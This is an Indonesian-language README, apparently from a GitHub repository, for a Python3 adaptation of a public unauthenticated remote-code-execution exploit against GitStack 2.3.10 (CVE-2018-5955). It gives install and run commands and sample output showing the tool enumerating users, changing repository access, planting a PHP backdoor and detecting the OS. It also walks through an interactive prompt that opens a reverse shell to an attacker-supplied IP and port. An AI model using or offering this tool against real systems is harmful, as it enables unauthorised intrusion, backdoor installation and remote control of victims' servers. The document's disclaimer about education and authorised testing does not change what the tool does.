Eksploitasi untuk CVE-2018-5955 GitStack 2.3.10 RCE yang tidak otentikasi
Eksploitasi: GitStack 2.3.10 Eksekusi Kode Jarak Jauh Tidak Aautitikasi
Tanggal: 18.01.2018
Tautan Perangkat Lunak: https://gitstack.com/
Penulis Eksploitasi: Kacper Szurek
Eksploitasi Asli: https://www.exploit-db.com/exploits/43777
Situs web: https://security.szurek.pl/
Kategori: Remote
CVE: CVE-2018-5955
Tanggal: 23.06.2023
Fitur Baru: RCE Interaktif, Deteksi OS, Fungsi Shell Terbalik, Diadaptasi dari Python2 ke Python3
CVE: CVE-2018-5955
Kategori: Remote
Saya tidak bertanggung jawab atas tindakan Anda, karena saya mempostingnya di github untuk tujuan pendidikan atau pengujian penetrasi bersertifikat dan resmi
Instal Persyaratan:
pip install colorama
Lalu, Anda dapat menjalankannya dengan:
python3 exploit.py
OS akan terdeteksi setelah Anda mengeksploitasi CVE, pada kenyataannya akan ada garis output ini: "[*] OS: $ OperatingSystem" (dimostrasi di bawah)
[+] Get user list
[+] Found user twreath
[+] Web repository already enabled
[+] Get repositories list
[+] Found repository Website
[+] Add user to repository
[+] Disable access for anyone
[+] Create backdoor in PHP
[*] Type 'shell' to get a reverse shell
[*] OS : Windows <----
Anda juga dapat mengetik "OS" untuk mengetahui jenis sistem operasi apa itu
Untuk mendapatkan shell terbalik yang sebenarnya pada target Anda dapat mengetik "shell" dan kemudian ketik IP Anda dan port mendengarkan Anda seperti ini:
RCE > shell
[?] Please enter the IP address for the shell: YOUR IP HERE
[?] Please enter the port number for the shell: YOUR LISTEN PORT HERE